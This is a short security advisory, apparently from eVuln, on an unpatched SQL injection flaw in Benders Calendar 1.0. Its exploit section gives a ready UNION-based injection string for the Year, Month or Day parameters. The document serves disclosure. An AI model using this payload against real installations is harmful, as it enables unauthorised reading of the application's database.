Benders Calendar version 1.0 is susceptible to SQL injection attacks. Exploitation details provided.
60854192744acb437eb561a320b50d6ef605efb6442f681091424b95853a7b01
New eVuln Advisory:
Benders Calendar SQL Injection
https://evuln.com/vulns/30/summary/bt/
--------------------Summary----------------
Software: Benders Calendar
Sowtware's Web Site: https://sourceforge.net/projects/benderscalendar/
Versions: 1.0
Critical Level: Harmless
Type: SQL Injection
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
eVuln ID: EV0030
-----------------Description---------------
All user-defined variables isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: gpc_magic_quotes: off
--------------Exploit----------------------
"Year" "Month" or "Day" value:
999' union select 1,2,3,4,5,6/*
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)